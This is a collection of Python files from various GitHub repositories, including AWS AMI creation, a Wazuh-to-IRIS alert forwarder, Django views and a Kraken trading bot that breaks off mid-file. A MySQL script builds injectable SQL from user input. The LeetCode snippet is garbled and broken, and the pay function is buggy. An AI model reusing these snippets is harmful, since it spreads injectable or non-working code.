{}'.format(vol.id))\n vol.delete()\n print('Registering image from {}'.format(snap.id))\n ami = conn.register_image(Name=name,\n Architecture='x86_64',\n RootDeviceName='xvda',\n VirtualizationType='hvm',\n BlockDeviceMappings=[\n { \n \t\t\t\t'Ebs': {\n \t \t\t\t 'SnapshotId': snap.id,\n \t\t\t'VolumeSize': 123,\n \t\t\t 'DeleteOnTermination': True\n }\n \t\t\t},\n\t\t\t ])\n print('ami {} created\\n'.format(ami))\n return ami\n\nif __name__ == \"__main__\":\n # Parse arguments\n parser = argparse.ArgumentParser(prog='run')\n parser.add_argument(\"-n\", \"--name\", action=\"store\", default=\"test-ami\",\n help=\"ami name to be created\")\n\n args = parser.parse_args()\n make_ami(input, args.name)\n","repo_name":"ClosingBracket/osv","sub_path":"scripts/ec2-make-MY-ami.py","file_name":"ec2-make-MY-ami.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"73897859291","text":"import mysql.connector\nconn = mysql.connector.connect(\n host=\"localhost\",\n user=\"developer\",\n password=\"12\",\n database=\"dbpython\"\n)\n\ncursor = conn.cursor()\n\nnome_produto = input(\"Insira o nome do produto que deseja alterar:\")\npergunta = input(\"Deseja alterar o valor do produto:\")\nif pergunta == 'sim' or 's':\n print(\"***Lembre-se de não utilizar virgulas para definir o valor, e sim um ponto!***\")\n valor = input(\"Insira o novo valor do produto:\")\n comando = f'UPDATE vendas SET valor = {valor} WHERE nome_produto = \"{nome_produto}\"'\n cursor.execute(comando)\n conn.commit()\n print(\"As alterações foram feitas com sucesso!\")\n\nelse:\n print(\"O Serviço de update foi finalizado sem nenhuma modificação!\")\n\ncursor.close()\nconn.close()\n","repo_name":"CloudEducationBrazil/WydenPythonParadigmas","sub_path":"08 SourceCodePython/aula26032022/deividy/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"pt","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"}
+{"seq_id":"13633181703","text":"# Using Divide and Conquer\nclass Solution:\n def longestCommonPrefix(self, strs) -> str:\n def commonWordBetweenTwoWords(l_str,r_str):\n longest_prefix= min(len(l_str),len(r_str))\n i=0\n while i= end:\n return strs[start]\n else:\n mid_point= (start+end)//2\n left= help_recursion(str_list,start,mid_point)\n right= help_recursion(str_list,mid_point+1,end)\n return commonWordBetweenTwoWords(left,right)\n if len(strs) == 0:\n return \"\"\n else:\n return help(strs,0,len(strs)-1)\n \n \n ","repo_name":"ruifan831/leetCodeRecord","sub_path":"14_LongestCommonPrefix.py","file_name":"14_LongestCommonPrefix.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38167151767","text":"from os import getenv\n\n# Namespace grouping the project components and RabbitMQTrigger objects\nTRIGGERS_NAMESPACE = getenv('TRIGGERS_NAMESPACE')\n\n# Group of the trigger CRD\nTRIGGERS_GROUP = getenv('TRIGGERS_GROUP')\n\n# k8s ApiVersion of the trigger CRD\nTRIGGERS_VERSION = getenv('TRIGGERS_VERSION')\n\n# Plural name of the trigger CRD\nTRIGGERS_PLURAL = getenv('TRIGGERS_PLURAL')\n\n# Name of the secret containing the triggers store\nTRIGGERS_STORE_SECRET = getenv('TRIGGERS_PLURAL')\n\n# Key in which to store the triggers global state on the secret\nTRIGGERS_SECRET_KEY = 'triggers_store'\n\n# Deployment name of the RabbitMQ events proxy\nEVENTS_PROXY_DEPLOYMENT = getenv('EVENTS_PROXY_DEPLOYMENT')\n","repo_name":"ivanvmoreno/bachelor-project","sub_path":"rabbitmq-trigger-operator/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"16729350005","text":"#!/usr/bin/env python3\n# custom-iris.py\n# Custom Wazuh integration script to send alerts to DFIR-IRIS\n\nimport sys\nimport json\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\n# Function to search for and extract the \"message\" field\ndef find_message_field(data):\n if isinstance(data, dict):\n if \"message\" in data:\n return data[\"message\"]\n for key, value in data.items():\n result = find_message_field(value)\n if result is not None:\n return result\n elif isinstance(data, list):\n for item in data:\n result = find_message_field(item)\n if result is not None:\n return result\n return None\n\n# Read parameters when integration is run\nalert_file = sys.argv[1]\napi_key = sys.argv[2]\nhook_url = sys.argv[3]\n\n# Read the alert file\nwith open(alert_file) as f:\n alert_json = json.load(f)\n\n# Extract field information\nalert_id = alert_json[\"id\"]\nalert_timestamp = alert_json[\"timestamp\"]\nalert_level = alert_json[\"rule\"][\"level\"]\nalert_title = alert_json[\"rule\"][\"description\"]\nalert_description = find_message_field(alert_json[\"data\"])\nagent_name = alert_json[\"agent\"][\"name\"]\nagent_ip = alert_json[\"agent\"][\"ip\"]\nagent_id = alert_json[\"agent\"][\"id\"]\nrule_id = alert_json[\"rule\"][\"id\"]\nrule_fires = alert_json[\"rule\"][\"firedtimes\"]\nalert_data = alert_json[\"data\"]\nalert_message = find_message_field(alert_json[\"data\"])\n\n# Convert Wazuh rule levels -> IRIS severity\nif(alert_level < 5):\n severity = 2\nelif(alert_level >= 5 and alert_level < 7):\n severity = 3\nelif(alert_level >= 7 and alert_level < 10):\n severity = 4\nelif(alert_level >= 10 and alert_level < 13):\n severity = 5\nelif(alert_level >= 13):\n severity = 6\nelse:\n severity = 1\n\n# Generate request\n# Reference: https://docs.dfir-iris.org/_static/iris_api_reference_v2.0.1.html#tag/Alerts/operation/post-case-add-alert\npayload = json.dumps({\n \"alert_title\": alert_title,\n \"alert_description\": f\"\"\"Agent ID: {agent_id}\nAgent IP: {agent_ip}\nAgent Name: {agent_name}\n\nAlert Details: {alert_description}\n\"\"\",\n \"alert_source\": \"Wazuh\",\n \"alert_source_ref\": alert_id,\n \"alert_source_link\": \"WAZUH_URL\",\n \"alert_severity_id\": severity, \n \"alert_status_id\": 2, # 'New' status\n \"alert_source_event_time\": alert_timestamp,\n \"alert_note\": \"\",\n \"alert_tags\": \"wazuh,\" + agent_name,\n \"alert_customer_id\": 1, # '1' for default 'IrisInitialClient'\n \"alert_source_content\": alert_json # raw log\n})\n\n# Send request to IRIS\nresponse = requests.post(hook_url, data=payload, headers={\"Authorization\": \"Bearer \" + api_key, \"content-type\": \"application/json\"})\n\nsys.exit(0)\n","repo_name":"maikroservice/Wazuh-IRIS-integration","sub_path":"custom-iris.py","file_name":"custom-iris.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"33835729908","text":"import pandas as pd\nfrom utils import limpar_texto\n\ndef carregar_nomes():\n nomes = pd.read_csv(\"dados/nomes.csv\")\n\n # Limpar first_name para busca\n nomes.first_name = nomes.first_name.apply(limpar_texto)\n\n return nomes\n\ndef obter_dados_por_nome(nomes, meu_nome):\n # Limpar meu_nome para busca\n meu_nome = limpar_texto(meu_nome)\n\n linha = nomes[nomes.first_name == meu_nome].iloc[0]\n \n return linha\n\ndef imprimir_saida(linha):\n texto_saida = f\"\"\"Nome: {linha.first_name}\nGênero: {linha.classification}\nProbabilidade: {linha.ratio}\nNomes alternativos: {linha.alternative_names}\"\"\"\n print(texto_saida)","repo_name":"ricardocarvalhods/projeto-zero","sub_path":"nomes.py","file_name":"nomes.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"5046306189","text":"from django.shortcuts import render\nfrom django.views.generic.base import View\nfrom django.db.models import Count, Avg, Max, Min, Sum\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nfrom django.http.response import HttpResponse\n\nfrom Organization.models import CityDict,CourseOrg,Teacher\nfrom Courses.models import Course\nfrom Openation.models import UserFavorite\nfrom Organization.pager import CustomPaginator\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom Organization.ask_form import AskForm\n\n# class OrgList(View):\n# \"\"\"\n# 机构列表,不适用github的分页,我们应该怎么做\n# \"\"\"\n# def get(self,request):\n# city_list = CityDict.objects.all()\n# org_list = CourseOrg.objects.all()\n# #聚合函数\n# nums = CourseOrg.objects.aggregate(k=Count('id',distinct=True))\n#\n# #django内置的分页,用好这个,分页组件更好用了\n# # 全部数据:Org_LIST,=》得出共有多少条数据\n# # per_page: 每页显示条目数量\n# # count: 数据总个数\n# # num_pages:总页数\n# # page_range:总页数的索引范围,如: (1,10),(1,200)\n# # page: page对象(是否具有下一页;是否有上一页;)\n# current_page = request.GET.get('page')\n# # Paginator对象\n# paginator = CustomPaginator(current_page, 9, org_list, 3)\n# try:\n# # Page对象\n# posts = paginator.page(current_page)\n# # has_next 是否有下一页\n# # next_page_number 下一页页码\n# # has_previous 是否有上一页\n# # previous_page_number 上一页页码\n# # object_list 分页之后的数据列表,已经切片好的数据\n# # number 当前页\n# # paginator paginator对象\n# except PageNotAnInteger:\n# posts = paginator.page(1)\n# except EmptyPage:\n# posts = paginator.page(paginator.num_pages)\n#\n# return render(request,'org-list.html',{\n# 'city_list':city_list,\n# 'posts':posts,\n# 'nums':nums,\n# })\n\n#自定制的组件不够理想\n\n\nclass OrgList(View):\n \"\"\"\n 机构,这里这种做法,其实是不合理的\n 这里没有改他的代码了,前端不太好\n 这里是这个项目最难的地方\n \"\"\"\n def get(self, request):\n city_list = CityDict.objects.all()\n org_list = CourseOrg.objects.all()\n hot_org = org_list.order_by('-click_nums')[:5]\n #聚合函数\n city_id = request.GET.get('city',0)\n if city_id:\n org_list= org_list.filter(city_id=int(city_id)).select_related('city')\n else:\n org_list = org_list.filter().select_related('city')\n category = request.GET.get('ct','')\n if category:\n org_list = org_list.filter(category=category)\n else:\n org_list = org_list.filter()\n sorts = request.GET.get('sort','')\n if sorts:\n if sorts == 'students':\n org_list=org_list.order_by('-students')\n elif sorts == 'courses':\n org_list=org_list.order_by('-courses')\n nums = org_list.count()\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n # Provide Paginator with the request object for complete querystring generation\n\n #(5)每一页显示的数量\n p = Paginator(org_list,2, request=request)\n\n orgs = p.page(page)\n\n return render(request,'org-list.html',\n {\"city_list\":city_list,\n 'org_list':orgs,\n 'nums':nums,\n 'city_id':city_id,\n 'category':category,\n 'hot_org':hot_org,\n 'sort':sorts\n })\n\n\nclass UserAsk(View):\n '''\n 用户提交询问,用ajax方式提交\n '''\n def post(self,request):\n user_ask = AskForm(request.POST)\n if user_ask.is_valid():\n user_ask.save(commit=True)\n #第一种\n return HttpResponse(\"{'status':'success'}\",content_type='application/json')\n #第二种import json序列化\n else:\n return HttpResponse(\"{'status':'fail','msg':'访问出错'}\",content_type='application/json')\n\n\n#第一种方法\n# class OrgDetailHome(View):\n# def get(self,request,**kwargs):\n# for k,v in kwargs.items():\n# kwargs[k] = int(v)\n# org_id=kwargs.get('org_id',None)\n# org_course = CourseOrg.objects.filter(id = org_id).first()\n# course_detail = org_course.course_set.all()[:3]\n# return render(request,'org-homepage.html',{\"org_course\":org_course,\"course_detail\":course_detail})\n\n\n# class OrgDetailHome1(View):\n# \"\"\"\n# 差点自定义模板语言\n# \"\"\"\n# def get(self,request,org_id):\n# current_page = 'home'\n# courses_detail = Course.objects.filter(course_org__id = int(org_id)).values('name','image','students',\n# 'learn_time','course_org__name','course_org__image','fav_nums','desc','id')[:2]\n#\n# org_name = CourseOrg.objects.filter(id = int(org_id)).first()\n# teachers = org_name.teacher_set.all()[:2]\n# print(courses_detail)\n# return render(request,'org-homepage.html',{\"courses\":courses_detail,\"teachers\":teachers,\n# \"current_page\":current_page})\n\n\nclass OrgHomeView(View):\n \"\"\"\n 机构首页\n \"\"\"\n def get(self, request, org_id):\n current_page = \"home\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n print(request.user)\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-homepage.html', {\n 'all_courses':all_courses,\n 'all_teachers': all_teachers,\n 'course_org':course_org,\n 'current_page':current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgCourseView(View):\n \"\"\"\n 课程机构列表页\n \"\"\"\n\n def get(self, request, org_id):\n current_page = \"course\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-detail-course.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav\n })\n\n\nclass OrgDescView(View):\n\n def get(self, request, org_id):\n current_page = \"desc\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-detail-desc.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgTeacherView(View):\n def get(self, request, org_id):\n current_page = \"teacher\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n return render(request, 'org-detail-teachers.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgFavView(View):\n \"\"\"用户收藏\"\"\"\n def post(self, request):\n fav_id = request.POST.get('fav_id', 0)\n fav_type = request.POST.get('fav_type', 0)\n\n if not request.user.is_authenticated():\n #判断用户登录状态\n print(request.user)\n return HttpResponse('{\"status\":\"fail\", \"msg\":\"用户未登录\"}', content_type='application/json')\n\n\n exist_records = UserFavorite.objects.filter(user=request.user, fav_id=int(fav_id), fav_type=int(fav_type))\n if exist_records:\n #如果记录已经存在, 则表示用户取消收藏\n exist_records.delete()\n if int(fav_type) == 1:\n course = Course.objects.get(id=int(fav_id))\n course.fav_nums -= 1\n if course.fav_nums < 0:\n course.fav_nums = 0\n course.save()\n elif int(fav_type) == 2:\n course_org = CourseOrg.objects.get(id=int(fav_id))\n course_org.fav_nums -= 1\n if course_org.fav_nums < 0:\n course_org.fav_nums = 0\n course_org.save()\n elif int(fav_type) == 3:\n teacher = Teacher.objects.get(id=int(fav_id))\n teacher.fav_nums -= 1\n if teacher.fav_nums < 0:\n teacher.fav_nums = 0\n teacher.save()\n return HttpResponse('{\"status\":\"success\", \"msg\":\"收藏\"}', content_type='application/json')\n else:\n user_fav = UserFavorite()\n if int(fav_id) > 0 and int(fav_type) > 0:\n user_fav.user = request.user\n user_fav.fav_id = int(fav_id)\n user_fav.fav_type = int(fav_type)\n user_fav.save()\n\n if int(fav_type) == 1:\n course = Course.objects.get(id=int(fav_id))\n course.fav_nums += 1\n course.save()\n elif int(fav_type) == 2:\n course_org = CourseOrg.objects.get(id=int(fav_id))\n course_org.fav_nums += 1\n course_org.save()\n elif int(fav_type) == 3:\n teacher = Teacher.objects.get(id=int(fav_id))\n teacher.fav_nums += 1\n teacher.save()\n\n return HttpResponse('{\"status\":\"success\", \"msg\":\"已收藏\"}', content_type='application/json')\n else:\n return HttpResponse('{\"status\":\"fail\", \"msg\":\"收藏出错\"}', content_type='application/json')\n\n\n\n\n","repo_name":"bulangdaoshi/lunix-","sub_path":"MXZX/app/Organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21255708194","text":"def computepay(hoursworked, payrate):\r\n #Variables\r\n totalpay = 0\r\n regularhours = 0\r\n overtimehours = 0\r\n regulartimelimit = 40\r\n regularpay = 0\r\n overtimepay = 0\r\n time_half = 1.5\r\n \r\n \r\n #If statement\r\n if hoursworked > regulartimelimit:\r\n regularhours = regulartimelimit\r\n overtimehours = hoursworked - Regulartimelimit\r\n \r\n else:\r\n regularhours = hoursworked\r\n overtimehours = 0\r\n \r\n regular = regularhours * payrate\r\n overtimepay = overtimehours * payrate * time_half\r\n \r\n totalpay = regularpay + overtimepay\r\n return totalpay\r\n#Calling the function\r\nprint (computepay(52, 20))\r\n ","repo_name":"Definitive-edition/Programming-for-IT-Problem-set-3","sub_path":"Exercise 6.py","file_name":"Exercise 6.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12282658960","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 31 22:54:47 2017\n\n@author: dboudeau\n\"\"\"\nimport exchange_krakken as kraken\nimport time,os\nimport persistenceHandler\nimport logging\nimport businessLogic\nimport notifier\nimport math\n\n\n# TODO Creer des classes traders/closed order car la c'est de la pure MERDE\n# TODO Unifier les differentes methodes qui appellent open and close orders. Il y en a plein ca sert à rien\n# TODO SI N ORDRE DE VENTE MANQUE IL FAUT GERER CA ! cf requete unclosed trade\n# TODO Chaque appel de open ou closed order devrait amener a un update de la table close\n\n# Var initialization\nAUTHORIZATION_OF_BUYING=bool(os.environ['AUTHORIZATION_OF_BUYING']=='True')\n# XRP -> XXRPZEUR LTC -> XLTCZEUR ETC -> XETCZEUR\nCURRENCY_CRAWLED_NAME=os.environ['CURRENCY_CRAWLED_NAME']\n# XRP -> XRPEUR LTC -> LTCEUR ETC -> ETCEUR\nCURRENCY_ORDER_NAME=os.environ['CURRENCY_ORDER_NAME']\n# XRP -> XXRP LTC -> XLTC ETC -> XETC\nCURRENCY_BALANCE_NAME=os.environ['CURRENCY_BALANCE_NAME']\n\nNOTIFY_ON_CLOSED_ORDERS=bool(os.environ['NOTIFY_ON_CLOSED_ORDERS']=='True')\n\n# Logging Management\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n\n\nkraken.init()\nlist_open_orders=kraken.get_single_open_orders(CURRENCY_ORDER_NAME)\nDONE=0\nNOT_DONE=1\n\n####################11\n# Initialize traders\nWAITING='wait'\nSELLING='sell'\nBUYING='buy'\nCLOSED='closed'\nCANCELED='canceled'\n\nsequence_number=-1\ndef increment_sequence():\n global sequence_number\n sequence_number=sequence_number+1\n return sequence_number\n\n##############################################################\n# TRADING SETUP \n##############################################################\nALLOWED_BUDGET=float(os.environ['ALLOWED_BUDGET'])\nEXPECTED_BENEFIT_BY_TRADER=float(os.environ['EXPECTED_BENEFIT_BY_TRADER'])\nNB_OF_TRADERS=int(os.environ['NB_OF_TRADERS'])\nSTEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE=float(os.environ['STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE'])\nMIN_BUYING_PRICE=float(os.environ['MIN_BUYING_PRICE'])\nMAX_BUYING_PRICE=float(os.environ['MAX_BUYING_PRICE'])\n\nBUDGET_BY_TRADER_LIST=os.environ['BUDGET_BY_TRADER_LIST']\ntemp=BUDGET_BY_TRADER_LIST.split(',')\nBUDGET_BY_TRADER_LIST = []\nfor item in temp:\n BUDGET_BY_TRADER_LIST.append(float(item))\n\nlist_trader=[]\nbuying_price=MAX_BUYING_PRICE\nfor index in range(0,NB_OF_TRADERS):\n # trader (integerId,budget(€),buy_unit_price,buying_order,Status,available_budget,engaged_budget\n list_trader.append([increment_sequence(),BUDGET_BY_TRADER_LIST[index],buying_price,None,WAITING,0.0,0.0])\n buying_price=round(buying_price-STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,1)\nif(list_trader[NB_OF_TRADERS-1][2]!=MIN_BUYING_PRICE):\n logger.error(\"Something wrong in configuration, minimum buying price (\"+str(MIN_BUYING_PRICE)+\") different from settings (\"+str(list_trader[NB_OF_TRADERS-1][2])+\")\")\n exit(1)\n\n##################################################################\n# COMMON FUNCTIONS\n##################################################################\n \n\ndef safetyCheckOnTradingCurrencySellingOrder(open_orders,owned_volume_of_traded_money):\n logger.info('On initizalization or after cancel order, check if there is no missing selling order')\n sold_volume=0.0\n for order in open_orders:\n if(order.get('type')==SELLING):\n sold_volume=sold_volume+order.get('vol')\n if(abs(owned_volume_of_traded_money - (sold_volume+0.1))>=0.5):\n \n # Particular case : If there is a buying/selling order partially processed, amount can be slightly different:\n logger.info(\"88 Checking for partial orders \")\n sum_buying_partial_selling=0.0\n sum_buying_partial_buying=0.0\n for item in open_orders:\n if (item.get('vol_exec')>0.0):\n if(item.get('type')==SELLING):\n logger.info(\"89-1 Adding \"+str(item.get('vol_exec'))+\" from SELLING order \"+item.get('order_id'))\n sum_buying_partial_selling=sum_buying_partial_selling+item.get('vol_exec')\n else:\n logger.info(\"89-2 Adding \"+str(item.get('vol_exec'))+\" from BUYING order \"+item.get('order_id'))\n sum_buying_partial_buying=sum_buying_partial_buying+item.get('vol_exec')\n \n logger.info(\" Sum partial BUYING order \"+str(sum_buying_partial_buying))\n logger.info(\" Sum partial SELLING order \"+str(sum_buying_partial_selling))\n logger.info(\" Sum of owned_volume_of_traded_money=\"+str(owned_volume_of_traded_money))\n logger.info(\" Sum of sold coins=\"+str(sold_volume))\n logger.info(\" Real sold =\"+str(sold_volume - sum_buying_partial_selling + sum_buying_partial_buying))\n \n \n if(abs(owned_volume_of_traded_money - (round( (sold_volume - sum_buying_partial_selling + sum_buying_partial_buying) ,1) ) )>=0.1):\n logger.info(CURRENCY_BALANCE_NAME+\" Sanity check error (Even with partial orders\")\n notifier.notify('Safety Check failed',CURRENCY_BALANCE_NAME+\" Sanity check error (Even with partial orders)\")\n exit(1)\n else:\n logger.info(CURRENCY_BALANCE_NAME+\" owned volume on exchange (\"+str(owned_volume_of_traded_money)+\") are all in sell mode (\"+str(round( (sold_volume - sum_buying_partial_selling + sum_buying_partial_buying) ,1))+\").Good to go.\")\n\n else:\n logger.info(CURRENCY_BALANCE_NAME+\" owned volume on exchange (\"+str(owned_volume_of_traded_money)+\") are all in sell mode (\"+str(sold_volume)+\").Good to go.\")\n \n # Checking number of open buying orders :\n counter_open_buying_order=0\n for open_order in open_orders:\n if(open_order.get('type')==BUYING):\n counter_open_buying_order=counter_open_buying_order+1\n \n # Test number of buying orders\n if(counter_open_buying_order>1):\n logger.error(\"More than 1 buying order detected\")\n notifier.notify(\"Fatal Error\",\"More than 1 buying order detected\"+str(open_order))\n logger.error(\"Exiting\")\n exit(1) \n \n\ndef calculatedEngagedMoney(volume,unit_sell_price,step_between_unit_sell_and_unit_price):\n buy_trade=volume * round(unit_sell_price-step_between_unit_sell_and_unit_price,2)\n fees=businessLogic.calculate_fee(volume * round(unit_sell_price-step_between_unit_sell_and_unit_price,2))\n engaged_money=math.ceil(buy_trade + fees)\n logger.info(\"Volume buyed was \"+str(volume) +\" at \"+str(round(unit_sell_price-step_between_unit_sell_and_unit_price,2) ))\n logger.info(\" fees were \"+str(fees) )\n logger.info(\" so (ceiled) engaged money was \"+str(float(round(buy_trade + fees,2))) )\n return float(engaged_money)\n\n# Ratio should be different\ndef budgetCalculation(list_trader,number_of_traders,logs=False):\n logger.info(\"------Begin calculating the budget for each trader before buying----\")\n available_budget=0\n for index in range(0,number_of_traders):\n # Define the ratio of the above(s) free traders which is allowed by below traders\n RATIO_OF_ABOVE_BUDGET_ALLOCATED=round((index+1)/number_of_traders,2)\n \n if(list_trader[index][4]==WAITING):\n list_trader[index][5]=round( (available_budget * RATIO_OF_ABOVE_BUDGET_ALLOCATED ) + list_trader[index][1] ,1)\n available_budget=available_budget+list_trader[index][1]\n else:\n list_trader[index][5]=0.0\n\n # Engaged money\n if(list_trader[index][6]>0 and list_trader[index][6]list_trader[index][2] and open_selling_order.get('price')<=round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2)):\n logger.info('Mapping order '+open_selling_order.get('order_id')+' - '+str(open_selling_order.get('price'))+' to trader '+str(list_trader[index][0]))\n logger.info('Trader '+str(index)+' ( '+str(list_trader[index][2])+' -> '+str(round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2))+')') \n is_order_mapped=True\n # Set up the trader with new status\n list_trader[index][3]=open_selling_order.get('order_id')\n list_trader[index][4]=SELLING\n list_trader[index][5]=0.0\n # Engaged money is selling volume*unit buy_price + fees\n list_trader[index][6]=calculatedEngagedMoney(open_selling_order.get('vol'),list_trader[index][2],STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n if(is_order_mapped):\n break;\n if is_order_mapped==False:\n logger.info('Order '+open_selling_order.get('order_id')+' is NOT MAPPED')\n\n# Calculate budget for further tests\nlist_trader=budgetCalculation(list_trader,NB_OF_TRADERS,logs=True)\n\n\n# Check that budget available on exchange is compliant \ntest_required_budget=list_trader[NB_OF_TRADERS-1][5]\ntest_available_budget=kraken.get_balance_EUR()\n\nif(test_available_budget0):\n is_buying_order_canceled_and_partially_executed=True\n \n opening_date=str(coe.get('opentm'))\n closing_date=str(coe.get('closetm'))\n\n # Don't send notification and dont store cancel order\n if(status!=CANCELED or is_buying_order_canceled_and_partially_executed==True):\n # Notify\n if(NOTIFY_ON_CLOSED_ORDERS==True):\n specific_text=\"\"\n if(is_buying_order_canceled_and_partially_executed==True):\n specific_text=\"PARTIALLY EXECUTED CANCEL \"\n notifier.notify(specific_text+'Order '+oe.get('order_id')+' '+str.upper(status),descr)\n\n logger.info('Order '+oe.get('order_id')+' '+str.upper(status)+\" \"+descr)\n \n # If an BUY order was CLOSED( or CANCELED but partially processed), search the concerned speculator to create sell order\n if(oe.get('type')==BUYING or oe.get('type')==SELLING):\n logger.info(\"order \"+str(oe.get('order_id'))+\" just closed, searching trader\")\n for index in range(0,NB_OF_TRADERS):\n if(list_trader[index][4]==BUYING and list_trader[index][3]==oe.get('order_id') and (status==CLOSED or is_buying_order_canceled_and_partially_executed==True) ):\n logger.info(\"1/ \"+str(BUYING)+\" order \"+oe.get('order_id')+\" was originally created by trader \"+str(index)+\".\")\n if(is_buying_order_canceled_and_partially_executed==True):\n logger.info(\"- Specific case of selling order creation after cancelation of partially executed buying order\")\n ########################\n # CREATING SELLING ORDER\n ########################\n # Get available amount of currency\n volume_buyed_to_sell=kraken.get_closed_order_volume_by_id(oe.get('order_id'),persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n logger.info(\"Volume to sell is :\"+str(volume_buyed_to_sell))\n if(volume_buyed_to_sell>0.0):\n unit_selling_price=round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2)\n logger.info(\"Unit sell price is:\"+str(unit_selling_price))\n # Selling order: secure_sell(volume,price,currency_crawling_name,persistenceHandler,current_step_between_buy_and_sell,CURRENCY_ORDER_NAME)\n created_selling_order=kraken.secure_sell(volume_buyed_to_sell,unit_selling_price,CURRENCY_CRAWLED_NAME,persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,CURRENCY_ORDER_NAME)\n fresh_open_orders.append(created_selling_order)\n list_trader[index][3]=created_selling_order.get('order_id')\n list_trader[index][4]=SELLING\n list_trader[index][5]=0.0\n # Setting engaged money\n list_trader[index][6]=calculatedEngagedMoney(volume_buyed_to_sell,unit_selling_price,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n logger.info(\"Trader \"+str(list_trader[index][0])+\" is now in mode\"+str(list_trader[index][4])+\" with order \"+str(list_trader[index][3])+\". Budget is :\"+str(list_trader[index][5]))\n break;\n if(list_trader[index][3]==oe.get('order_id') and ((list_trader[index][4]==SELLING) or ((list_trader[index][4]==BUYING) and (status==CANCELED)))):\n logger.info(\"2/ \"+str(list_trader[index][4])+\" order \"+oe.get('order_id')+\" was originally created by trader \"+str(index)+\".\")\n ####################################################\n # MANAGE SELL ENJOYMENT, OR BUY CANCELATION\n ####################################################\n flag_benefit=False\n if(list_trader[index][4]==SELLING):\n flag_benefit=True\n \n list_trader[index][3]=None\n list_trader[index][4]=WAITING\n # Budget will be calculated in the iteration\n list_trader[index][5]=0.0\n list_trader[index][6]=0.0\n logger.info(\"Trader \"+str(list_trader[index][0])+\" is now in mode\"+str(WAITING))\n \n # Special notification if to give you benefits\n if(flag_benefit):\n try:\n benefits=businessLogic.estimate_benefits(list_trader[index][2],volume,round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2))\n todays_benefits=businessLogic.calculate_today_benefits(persistenceHandler.get_todays_benefits())\n logger.info(\"Todays Benefits are \"+str(todays_benefits))\n notifier.notify(\";) Congrats\",\"If configuration did t change, Benefits are little bit under \"+str(benefits)+\"€\\nTotal for today :\"+str(todays_benefits[1])+\"€ (in \"+str(todays_benefits[0])+\" trades)\")\n logger.info(\"CONGRATULATIONS !!! Benefits are little bit under \"+str(benefits)+\"€\")\n logger.info(\"---------------------Total for today-> \"+str(todays_benefits[1])+\"€ (\"+str(todays_benefits[0])+\" trades)\")\n except Exception as e:\n 